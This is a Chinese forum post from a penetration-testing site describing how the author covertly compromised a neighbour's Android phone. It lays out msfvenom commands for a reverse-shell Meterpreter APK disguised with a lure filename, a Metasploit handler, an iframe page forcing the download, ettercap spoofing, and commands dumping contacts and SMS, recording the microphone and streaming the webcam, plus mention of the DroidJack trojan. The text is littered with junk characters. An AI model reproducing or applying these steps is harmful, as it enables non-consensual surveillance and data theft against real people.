中国网络渗透测试联盟

标题: metasploit+ettercap中间人攻击成功入侵邻居手机 [打印本页]
作者: admin    时间: 2018-10-20 20:30
标题: metasploit+ettercap中间人攻击成功入侵邻居手机

6 `. u4 W8 Z8 g: F 五、msf+ettercap入侵邻居安卓手机 : @% G2 M: _- }8 z' c

' J+ V2 ]" k! U

( N/ F: p2 _3 s* |, F' ^ 首先启动msf 9 @( U X" r L+ _5 Y( b) Z: i1 u( Z

: A1 j- c$ C( V& T

# }- l) B2 A+ a: j) X1 e 先用kali生成一个安卓木马,如下命令: " M% e* O% p7 c1 N$ q

5 Y5 J% t* I. ]/ Y0 X6 Q

" C* |5 D C9 y" j. v Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 1 A1 `, R4 T* P& s0 I. W8 J: B

' [: a, m. C& r8 T9 b4 N& e

+ R4 {- ?- U+ } 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 , ]" f/ \ {% z* ^' ^0 \

0 X) p7 Z+ c. ]1 j8 I/ Q

9 B. ?5 h5 S- }; `3 b 然后进入msf # T7 b$ A) {/ ?8 @/ A9 | [* v" H

# w! x2 a. L8 {

8 z; e7 N) S2 m/ Y5 G use exploit/multi/handler . ~' L0 q3 K% P7 ] ~) y" ^

, X6 G# a% D! \% h

4 W$ S: k' R, J# k3 r) z set payload android/meterpreter/reverse_tcp 8 {# o U4 _8 G% W

* a z( v# F; D3 `1 i |5 w9 Q- k4 A

0 y& O! Q7 F8 E6 O- I set LHOST 192.168.0.109 //ipkailiip 4 e* x' W: Y) ~) k+ @) ^4 d

3 M0 p9 E% \9 k& p7 ]8 F& n$ U

$ {$ H& z; `* l4 |3 T3 y3 F set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ) U' q4 n' o9 \

3 Q& p2 Z2 f) i H" G

" H% w6 u0 F8 S" _ f( F0 d Exploit . w4 F9 t) i' ^$ g v4 k( J

: G" w* r; Z/ ` n5 ^- O

& V7 ~$ h$ ~$ B! n- s   ; ~- D+ G8 `' J& M; \

( S: z& O* M* u) ~# h7 l

1 o6 i: g# g# {& r+ [ 下面我们开启ettercap -G : }" e& R: a8 A5 n+ d1 `& u

* F& c4 O) g5 e; S6 J

& v2 g& Y0 p2 k 我物理IP 6 v5 g$ `7 }5 Y1 H; G' Z6 v

0 c* V' t3 v5 h$ E0 @, {9 r

! a. V: f/ v8 l0 c   C8 [$ h' h/ @5 V0 Y, g# J0 T

4 I g* u `$ R5 M* Z

0 Y1 Z$ j- ^2 t; |; d/ T 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ) ~# h8 q) W" P* y

& d) m9 f5 D5 h, |( _

/ J3 o/ f& |; a- K# n 下面我们来设置一下 " W) ~+ P$ s9 O: p) S

% d7 G' e- Z( S! J* G0 V

* A* C. N' N, m% z# X ~   : Y% X$ \; q6 K) x

0 Y' u; y- S& I* i0 ?

. c, W I: c: d5 ^! r 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, % Y' ^0 _: s6 i; E! k+ O; H' V4 w

( S5 t1 f/ ]; {) g- v

& B& W* T2 k+ K+ }0 l' \# z1 v   : b# t' w$ _& E' O3 J1 ~

0 I9 J! D- ^# {

S2 x6 i7 w3 y8 g   1 d4 _' w: S* [( p, t

: `7 _- J: b- d! S

$ C+ f/ g6 E* T4 E. x   : o: O' T0 K% d4 `7 l% Z$ w6 S( }

! u8 |9 P- `% J! m/ @1 o

8 H' h$ c9 @1 Z2 C9 {! L5 ]   2 v; c' s6 W" w% F/ p8 U8 F

4 l4 s; g5 B: f! g0 K0 {

1 j8 s- C G) P   * T5 j, T0 r. j& m8 Z8 K

" s+ p- K& }0 S9 @

7 a4 C- \# p0 J( V/ r! G- v   + `: m$ X& K8 l% w/ Q; D) L& d

$ n) w! _/ h9 l4 W+ m

) {$ L. m1 k7 T- [% a, M/ ?% z" W3 k   5 P! ?6 n# {4 Z

# }; [, |9 u& A8 M5 W0 w! e; b. q

$ p+ z7 Z9 a0 p8 u& l/ M* }   1 G. M* F9 R D# |. ^

% K, Z/ _ E) T( ~ m

1 a2 Z: K% M& }# y; {   5 \2 h; |; d, O# B4 l' s- d6 W& c

9 S E1 l0 U. ~" ^3 y0 {9 ?% b6 Z

2 `) K% \; E- w   6 J7 J6 y1 [5 [

6 @; Z$ c" J" n5 T9 E

7 p; a( K) p( n5 ]2 n0 M$ S   ) r$ Z7 [' R; |0 _5 M

- C# I, g" K6 B

9 T/ {% r* ?* w( z" |2 l, O C   $ w2 e; V4 u1 ]7 ^! S$ i3 A( u& T0 \

* x% x* ^9 g; c* y2 D- t

& j5 I! |4 ]# L* }8 J   " O2 ~9 u6 T% G8 f% r1 u

+ l+ c* g6 M2 D/ i$ t9 R" \

l3 F; F) C/ p( T* h. |, C+ [ 下面我们开始攻击 2 I: w+ f8 E( |" ^3 R- A

4 v. z$ \0 ^5 ^& I

5 e& z4 d% W3 Y2 n4 g( H   2 i( a( l3 [& T5 q- e% h. \% x) L

$ r- l5 ~/ }2 ~5 b# N

$ Z6 L$ h! D# k' m, S7 y   5 f R& c# W* o1 B! K) v

s0 Q+ e" V4 `5 q* ~! Q2 t

. n7 l9 n5 J" E   + P' r! m# R: n- _* K" G% a" O9 x

6 q8 C5 V; @: p* p

* {+ n- [. P- V9 z q5 f* s   ) Y, U6 h* S* C: n) k0 U

" t+ y# j% U* V" v6 J1 j& V

7 p7 s9 L( q; A- _" B) Q' y# x   3 U& ?; s+ h! ]6 c/ M! ~2 i: j

; u( n7 f k6 k& @* _

9 {0 m9 M" `' E 大概过了5分钟多,发现反弹成功了 6 r7 l) G3 Q( j j5 J: K

0 g# }& n+ {! g) \4 J* t

6 f) e% G* v/ g; C+ p   4 f2 m7 j+ Z+ F: K! {& ]- G; F

7 e# d+ g) k3 o u

0 }( r# T1 E0 n: W+ J( E   / F0 ] Y' J; p) g

& C& y) o( q; G1 I

3 y9 f" t) P2 Z8 k   ! H* Y+ @7 D' A! b/ @4 i3 O

6 k0 M2 L8 {1 [, s- \8 ^

3 J, s+ L% k" x& W; l8 F! L- R! p   " V" E: \1 G8 w& v! E+ e

" j) {# W9 e9 H5 L$ t

3 N6 Q* G' K4 W, G6 [' t   ; V" t4 o( N# O5 n

+ G4 s- t! `8 m/ Z, L" G+ I

. V7 A* c/ |# V3 x   % e$ x4 K0 }) y( N" B8 R

$ \9 h& ^; G9 V

4 c0 W& P5 [" m: v7 W+ C2 R   : B& ~2 N/ k% S# ?

' C5 f+ Y) `4 @% R9 J7 ^+ K/ E

# }3 f& ~% G2 D2 G: g 执行命令 % X, r3 F" Y, A' |$ q! \, Y

1 p$ @; O7 W- ]1 K* _# b6 `& C

1 S( b e1 m& V   6 U' J# {, g% j( M+ K

7 _* X3 y0 b& [% A, T

2 R' }9 z8 [& `6 S1 l' k dump_contacts    --》这个是导出电话 ]/ P7 p( y, A: p

# r5 m6 e/ Q7 J( d) H( S; m

( V6 r N7 x! x S) f1 M dump_sms --》这个是导出信息 # M$ K; v( j, e' i% s% w

) F# s8 v6 x0 h8 c

; A+ |: b# A8 N P: W record_mic     Record audio from the default microphone for X seconds 0 _7 K+ `! O2 S3 `0 D( ~

e/ H# y' _' M5 }( u5 i/ a$ Y

, Z3 R: h( N \" c     webcam_chat    Start a video chat 1 _# F! [. X& k# }0 [

4 E) _+ k$ M O$ @1 }

8 V: Q- r/ y1 D7 Q3 |2 j9 b     webcam_list    List webcams 5 g6 W, e, [' y* G- o

- p6 t3 v2 t/ Q* ^$ x: A" ^) c: ~5 q

2 V; R- x9 @* r8 N9 ^     webcam_snap    Take a snapshot from the specified webcam 9 E! P+ G* T- b& Y! e) |# n- z/ L

3 @* P1 c& c L

# \7 j& h3 ~) N2 ?( }) G1 P2 l- t1 T( P webcam_stream  lay a video stream from the specified webcam + ]7 }0 \6 e' y: X- o

f, X0 B8 s4 |7 l2 `9 ~$ V/ x. H

) @4 ], U! ]9 n5 B: m( ^9 r   % o/ V5 A/ Z2 z

& E1 l; m) u2 I) U

8 ~% T, O+ g4 |- Z& |   # e: C" M6 @" r$ n+ x) f8 |8 d

* v* A; d: N2 P3 ^- O5 o

% N6 R X# {4 m0 }5 n3 B. O' c 我们打开看一下电话薄, ' O7 [) X4 }3 O

. i9 U* F5 ]5 n8 K7 I# h% y/ R

7 U+ m" K+ `* n- x   . \. H% X' B9 U5 E1 ?% o0 Z

9 A! P- f; D: o1 H4 T! W9 m$ T

) F( L; I& ?! w0 m, \   6 \9 ?! h5 }. a, [% _

0 e/ i" S4 l8 h7 ?' ]6 P# o

) D2 o0 c* X* b0 |& \   ( z( a1 m1 G0 C

( `9 u4 P* a5 O5 R% R& Y

; c5 h; \! W$ Z4 m   $ p! ^( P- S0 a1 q' m

; W/ i B8 B: T

, c& u6 g5 W' P$ s, F   : @4 S6 i9 t: y2 \7 i

$ Q6 u" I2 T: T$ X+ V

; @9 ?% Q! ^/ O3 w* O, Z   2 |" F6 Y& G: d+ a# A0 d8 t1 q( ]

( v( { E3 S* T+ P* z& [" W- f

3 g$ ~/ ?2 F3 R) N' S, s5 E 我们同时欺骗成DroidJack木马,使用方法如图: 0 d( o* }7 q. a# X- p$ }1 ^

/ s, m6 P! g) a. f

$ i0 v1 @3 |. S( v   ~5 e p3 B" ?3 b

+ E( F3 j8 {* K& E( p0 X, G0 D

7 m6 ]7 H, t5 m" @! Z8 j   % L; j. r+ ]6 I# y( J3 }

' }9 v9 j: B3 l

% W' E% ^) Y( K% S5 ~3 N( W( m   7 G: b7 b; g& G

2 W( l+ E- a# h1 f3 ~& m5 d) d* i

) H+ O K0 {! C9 f# _* M: x 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 5 D6 L$ H$ Q% D

2 v z" m' E8 r& k9 z' H

0 i8 R% @# W( N/ {   # F, y4 k2 U) D9 B

% L/ C8 \$ m# y( U# ]

& j( e( V2 T' U. [# r# ~   ! b* Q4 s* Y$ z: n- y. c' K

. c% ^ }" S3 x

6 e; m" N0 `7 n6 x8 N1 W- D) y   3 @- q1 N( I0 h3 U$ [) V; b

. c. e2 a W* i5 }* E, i

/ V2 W/ L( p" H$ ?. u5 t / I. S# X, i' m# J% Y

( a( n) h8 Y" J. Y W! S

- U0 z+ I& h6 G: J7 g% g u# f1 j
0 S+ s% m& M1 I5 _1 T





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2